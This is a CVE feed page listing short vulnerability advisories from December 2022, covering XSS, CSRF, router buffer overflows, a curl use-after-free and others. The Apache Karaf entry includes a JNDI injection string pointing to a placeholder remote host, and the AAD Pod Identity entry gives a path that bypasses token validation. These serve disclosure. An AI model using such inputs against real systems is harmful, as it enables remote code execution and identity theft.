CVE Feed

    Dashboard / CVE

    4.3
    Medium

    CVE-2021-4275

    Last Modified: 14 Apr 2025

    A vulnerability, which was classified as problematic, was found in katlings pyambic-pentameter. Affected is an unknown function. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The name of the patch is 974f21aa1b2527ef39c8afe1a5060548217deca8. It is recommended to apply a patch to fix this issue. VDB-216498 is the identifier assigned to this vulnerability.

    Published: 21 Dec 2022
    3.5
    Low

    CVE-2020-36621

    Last Modified: 15 Apr 2025

    A vulnerability, which was classified as problematic, has been found in chedabob whatismyudid. Affected by this issue is the function exports.enrollment of the file routes/mobileconfig.js. The manipulation leads to cross site scripting. The attack may be launched remotely. The name of the patch is bb33d4325fba80e7ea68b79121dba025caf6f45f. It is recommended to apply a patch to fix this issue. VDB-216470 is the identifier assigned to this vulnerability.

    Published: 21 Dec 2022
    3.5
    Low

    CVE-2021-4265

    Last Modified: 21 Nov 2024

    A vulnerability was found in siwapp-ror. It has been rated as problematic. This issue affects some unknown processing. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 924d16008cfcc09356c87db01848e45290cb58ca. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216467.

    Published: 21 Dec 2022
    3.5
    Low

    CVE-2021-4266

    Last Modified: 14 Apr 2025

    A vulnerability classified as problematic has been found in Webdetails cpf up to 9.5.0.0-80. Affected is an unknown function of the file core/src/main/java/pt/webdetails/cpf/packager/DependenciesPackage.java. The manipulation of the argument baseUrl leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 9.5.0.0-81 is able to address this issue. The name of the patch is 3bff900d228e8cae3af256b447c5d15bdb03c174. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216468.

    Published: 21 Dec 2022
    5.3
    Medium

    CVE-2022-23551

    Last Modified: 15 Apr 2025

    aad-pod-identity assigns Azure Active Directory identities to Kubernetes applications and has now been deprecated as of 24 October 2022. The NMI component in AAD Pod Identity intercepts and validates token requests based on regex. In this case, a token request made with backslash in the request (example: `/metadata/identity\oauth2\token/`) would bypass the NMI validation and be sent to IMDS allowing a pod in the cluster to access identities that it shouldn't have access to. This issue has been fixed and has been included in AAD Pod Identity release version 1.8.13. If using the AKS pod-managed identities add-on, no action is required. The clusters should now be running the version 1.8.13 release.

    Published: 21 Dec 2022
    6.1
    Medium

    CVE-2022-4617

    Last Modified: 14 Apr 2025

    Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.3.2.

    Published: 21 Dec 2022
    7.8
    High

    CVE-2022-46282

    Last Modified: 16 Apr 2025

    Use after free vulnerability in CX-Drive V3.00 and earlier allows a local attacker to execute arbitrary code by having a user to open a specially crafted file,

    Published: 21 Dec 2022
    5.3
    Medium

    CVE-2022-4630

    Last Modified: 14 Apr 2025

    Sensitive Cookie Without 'HttpOnly' Flag in GitHub repository lirantal/daloradius prior to master.

    Published: 21 Dec 2022
    4.3
    Medium

    CVE-2022-4633

    Last Modified: 21 Nov 2024

    A vulnerability was found in Auto Upload Images up to 3.3.0 and classified as problematic. Affected by this issue is some unknown functionality of the file src/setting-page.php of the component Settings Handler. The manipulation leads to cross-site request forgery. The attack may be launched remotely. Upgrading to version 3.3.1 is able to address this issue. The name of the patch is 895770ee93887ec78429c78ffdfb865bee6f9436. It is recommended to upgrade the affected component. VDB-216482 is the identifier assigned to this vulnerability.

    Published: 21 Dec 2022
    7.8
    High

    CVE-2022-46330

    Last Modified: 16 Apr 2025

    Squirrel.Windows is both a toolset and a library that provides installation and update functionality for Windows desktop applications. Installers generated by Squirrel.Windows 2.0.1 and earlier contain an issue with the DLL search path, which may lead to insecurely loading Dynamic Link Libraries. As a result, arbitrary code may be executed with the privilege of the user invoking the installer.

    Published: 21 Dec 2022
    3.5
    Low

    CVE-2022-4637

    Last Modified: 14 Apr 2025

    A vulnerability classified as problematic has been found in ep3-bs up to 1.7.x. This affects an unknown part. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.8.0 is able to address this issue. The name of the patch is ef49e709c8adecc3a83cdc6164a67162991d2213. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216495.

    Published: 21 Dec 2022
    7.5
    High

    CVE-2022-47581

    Last Modified: 16 Apr 2025

    Isode M-Vault 16.0v0 through 17.x before 17.0v24 can crash upon an LDAP v1 bind request.

    Published: 21 Dec 2022
    9.8
    Critical

    CVE-2022-47635

    Last Modified: 16 Apr 2025

    Wildix WMS 6 before 6.02.20221216, WMS 5 before 5.04.20221214, and WMS4 before 4.04.45396.23 allows Server-side request forgery (SSRF) via ZohoClient.php.

    Published: 21 Dec 2022
    5.5
    Medium

    CVE-2022-4415

    Last Modified: 3 Nov 2025

    A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.

    Published: 21 Dec 2022
    6.5
    Medium

    CVE-2022-36221

    Last Modified: 16 Apr 2025

    Nokia Fastmile 3tg00118abad52 is affected by an authenticated path traversal vulnerability which allows attackers to read any named pipe file on the system.

    Published: 21 Dec 2022
    9.8
    Critical

    CVE-2022-40145

    Last Modified: 15 Apr 2025

    This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8

    Published: 21 Dec 2022
    7.5
    High

    CVE-2022-40899

    Last Modified: 15 Apr 2025

    An issue discovered in Python Charmers Future 0.18.2 and earlier allows remote attackers to cause a denial of service via crafted Set-Cookie header from malicious web server.

    Published: 21 Dec 2022
    5.4
    Medium

    CVE-2022-43543

    Last Modified: 16 Apr 2025

    KDDI +Message App, NTT DOCOMO +Message App, and SoftBank +Message App contain a vulnerability caused by improper handling of Unicode control characters. +Message App displays text unprocessed, even when control characters are contained, and the text is shown based on Unicode control character's specifications. Therefore, a crafted text may display misleading web links. As a result, a spoofed URL may be displayed and phishing attacks may be conducted. Affected products and versions are as follows: KDDI +Message App for Android prior to version 3.9.2 and +Message App for iOS prior to version 3.9.4, NTT DOCOMO +Message App for Android prior to version 54.49.0500 and +Message App for iOS prior to version 3.9.4, and SoftBank +Message App for Android prior to version 12.9.5 and +Message App for iOS prior to version 3.9.4

    Published: 21 Dec 2022
    5.9
    Medium

    CVE-2022-43552

    Last Modified: 21 Nov 2024

    A use after free vulnerability exists in curl <7.87.0. Curl can be asked to *tunnel* virtually all protocols it supports through an HTTP proxy. HTTP proxies can (and often do) deny such tunnel operations. When getting denied to tunnel the specific protocols SMB or TELNET, curl would use a heap-allocated struct after it had been freed, in its transfer shutdown code path.

    Published: 21 Dec 2022
    5.1
    Medium

    CVE-2022-38391

    Last Modified: 15 Apr 2025

    IBM Spectrum Control 5.4 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 233982.

    Published: 20 Dec 2022
    4.4
    Medium

    CVE-2022-39166

    Last Modified: 15 Apr 2025

    IBM Security Guardium 11.4 could allow a privileged user to obtain sensitive information inside of an HTTP response. IBM X-Force ID: 235405.

    Published: 20 Dec 2022
    7.7
    High

    CVE-2022-23542

    Last Modified: 16 Apr 2025

    OpenFGA is an authorization/permission engine built for developers and inspired by Google Zanzibar. During an internal security assessment, it was discovered that OpenFGA version 0.3.0 is vulnerable to authorization bypass under certain conditions. This issue has been patched in version 0.3.1 and is backward compatible.

    Published: 20 Dec 2022
    6.2
    Medium

    CVE-2022-43382

    Last Modified: 16 Apr 2025

    IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a local user with elevated privileges to exploit a vulnerability in the lpd daemon to cause a denial of service. IBM X-Force ID: 238641.

    Published: 20 Dec 2022
    4.6
    Medium

    CVE-2022-46771

    Last Modified: 16 Apr 2025

    IBM UrbanCode Deploy (UCD) 6.2.0.0 through 6.2.7.18, 7.0.5.0 through 7.0.5.13, 7.1.0.0 through 7.1.2.9, 7.2.0.0 through 7.2.3.2 and 7.3.0.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 242273.

    Published: 20 Dec 2022
    6.5
    Medium

    CVE-2022-23537

    Last Modified: 4 Nov 2025

    PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. Buffer overread is possible when parsing a specially crafted STUN message with unknown attribute. The vulnerability affects applications that uses STUN including PJNATH and PJSUA-LIB. The patch is available as a commit in the master branch (2.13.1).

    Published: 20 Dec 2022
    6.2
    Medium

    CVE-2022-43875

    Last Modified: 16 Apr 2025

    IBM Financial Transaction Manager for SWIFT Services for Multiplatforms 3.2.4 could allow an authenticated user to lock additional RM authorizations, resulting in a denial of service on displaying or managing these authorizations. IBM X-Force ID: 240034.

    Published: 20 Dec 2022
    5.3
    Medium

    CVE-2022-43872

    Last Modified: 16 Apr 2025

    IBM Financial Transaction Manager 3.2.4 authorization checks are done incorrectly for some HTTP requests which allows getting unauthorized technical information (e.g. event log entries) about the FTM SWIFT system. IBM X-Force ID: 239708.

    Published: 20 Dec 2022
    5.5
    Medium

    CVE-2022-4619

    Last Modified: 8 Apr 2026

    The Sidebar Widgets by CodeLights plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘Extra CSS class’ parameter in versions up to, and including, 1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

    Published: 20 Dec 2022
    5.7
    Medium

    CVE-2022-44643

    Last Modified: 15 Apr 2025

    A vulnerability in the label-based access control of Grafana Labs Grafana Enterprise Metrics allows an attacker more access than intended. If an access policy which has label selector restrictions also has been granted access to all tenants in the system, the label selector restrictions will not be applied when using this policy with the affected versions of the software. This issue affects: Grafana Labs Grafana Enterprise Metrics GEM 1.X versions prior to 1.7.1 on AMD64; GEM 2.X versions prior to 2.3.1 on AMD64.

    Published: 20 Dec 2022
    8.8
    High

    CVE-2022-4287

    Last Modified: 14 Apr 2025

    Authentication bypass in local application lock feature in Devolutions Remote Desktop Manager  2022.3.26 and earlier on Windows allows malicious user to access the application.

    Published: 20 Dec 2022
    9.8
    Critical

    CVE-2022-46421

    Last Modified: 16 Apr 2025

    Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow Hive Provider.This issue affects Apache Airflow Hive Provider: before 5.0.0.

    Published: 20 Dec 2022
    5.5
    Medium

    CVE-2023-3357

    Last Modified: 10 Mar 2025

    A NULL pointer dereference flaw was found in the Linux kernel AMD Sensor Fusion Hub driver. This flaw allows a local user to crash the system.

    Published: 20 Dec 2022
    7.5
    High

    CVE-2022-25940

    Last Modified: 16 Apr 2025

    All versions of package lite-server are vulnerable to Denial of Service (DoS) when an attacker sends an HTTP request and includes control characters that the decodeURI() function is unable to parse.

    Published: 20 Dec 2022
    7.5
    High

    CVE-2022-25931

    Last Modified: 16 Apr 2025

    All versions of package easy-static-server are vulnerable to Directory Traversal due to missing input sanitization and sandboxes being employed to the req.url user input that is passed to the server code.

    Published: 20 Dec 2022
    7.5
    High

    CVE-2022-25904

    Last Modified: 16 Apr 2025

    All versions of package safe-eval are vulnerable to Prototype Pollution which allows an attacker to add or modify properties of the Object.prototype.Consolidate when using the function safeEval. This is because the function uses vm variable, leading an attacker to modify properties of the Object.prototype.

    Published: 20 Dec 2022
    7.4
    High

    CVE-2022-25171

    Last Modified: 16 Apr 2025

    The package p4 before 0.0.7 are vulnerable to Command Injection via the run() function due to improper input sanitization

    Published: 20 Dec 2022
    6.4
    Medium

    CVE-2022-38655

    Last Modified: 16 Apr 2025

    BigFix WebUI non-master operators are missing controls that prevent them from being able to modify the relevance of fixlets or to deploy fixlets from the BES Support external site.

    Published: 20 Dec 2022
    7.5
    High

    CVE-2022-46310

    Last Modified: 17 Apr 2025

    The TelephonyProvider module has a vulnerability in obtaining values.Successful exploitation of this vulnerability may affect data confidentiality.

    Published: 20 Dec 2022
    9.8
    Critical

    CVE-2022-46320

    Last Modified: 16 Apr 2025

    The kernel module has an out-of-bounds read vulnerability. Successful exploitation of this vulnerability may cause memory overwriting.

    Published: 20 Dec 2022
    7.5
    High

    CVE-2022-41596

    Last Modified: 16 Apr 2025

    The system tool has inconsistent serialization and deserialization. Successful exploitation of this vulnerability will cause unauthorized startup of components.

    Published: 20 Dec 2022
    7.5
    High

    CVE-2022-42949

    Last Modified: 17 Apr 2025

    Silverstripe silverstripe/subsites through 2.6.0 has Insecure Permissions.

    Published: 20 Dec 2022
    9.8
    Critical

    CVE-2022-4337

    Last Modified: 21 Nov 2024

    An out-of-bounds read in Organization Specific TLV was found in various versions of OpenvSwitch.

    Published: 20 Dec 2022
    7.5
    High

    CVE-2022-46432

    Last Modified: 16 Apr 2025

    An exploitable firmware modification vulnerability was discovered on TP-Link TL-WR743ND V1. An attacker can conduct a MITM (Man-in-the-Middle) attack to modify the user-uploaded firmware image and bypass the CRC check, allowing attackers to execute arbitrary code or cause a Denial of Service (DoS). This affects v3.12.20 and earlier.

    Published: 20 Dec 2022
    7.5
    High

    CVE-2022-46537

    Last Modified: 16 Apr 2025

    Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the security parameter at /goform/WifiBasicSet.

    Published: 20 Dec 2022
    7.5
    High

    CVE-2022-46549

    Last Modified: 16 Apr 2025

    Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the deviceId parameter at /goform/saveParentControlInfo.

    Published: 20 Dec 2022
    9.8
    Critical

    CVE-2022-46326

    Last Modified: 16 Apr 2025

    Some smartphones have the out-of-bounds write vulnerability. Successful exploitation of this vulnerability may cause system service exceptions.

    Published: 20 Dec 2022
    7.1
    High

    CVE-2022-47578

    Last Modified: 21 Nov 2024

    An issue was discovered in the endpoint protection agent in Zoho ManageEngine Device Control Plus 10.1.2228.15. Despite configuring complete restrictions on USB pendrives, USB HDD devices, memory cards, USB connections to mobile devices, etc., it is still possible to bypass the USB restrictions by booting into Safe Mode. This allows a file to be exchanged outside the laptop/system. Safe Mode can be launched by any user (even without admin rights). Data exfiltration can occur, and also malware might be introduced onto the system. NOTE: the vendor's position is "it's not a vulnerability in our product."

    Published: 20 Dec 2022
    5.5
    Medium

    CVE-2022-48064

    Last Modified: 21 Nov 2024

    GNU Binutils before 2.40 was discovered to contain an excessive memory consumption vulnerability via the function bfd_dwarf2_find_nearest_line_with_alt at dwarf2.c. The attacker could supply a crafted ELF file and cause a DNS attack.

    Published: 20 Dec 2022
    7.5
    High

    CVE-2022-46550

    Last Modified: 16 Apr 2025

    Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the urls parameter at /goform/saveParentControlInfo.

    Published: 20 Dec 2022
    7.5
    High

    CVE-2022-46551

    Last Modified: 16 Apr 2025

    Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the time parameter at /goform/saveParentControlInfo.

    Published: 20 Dec 2022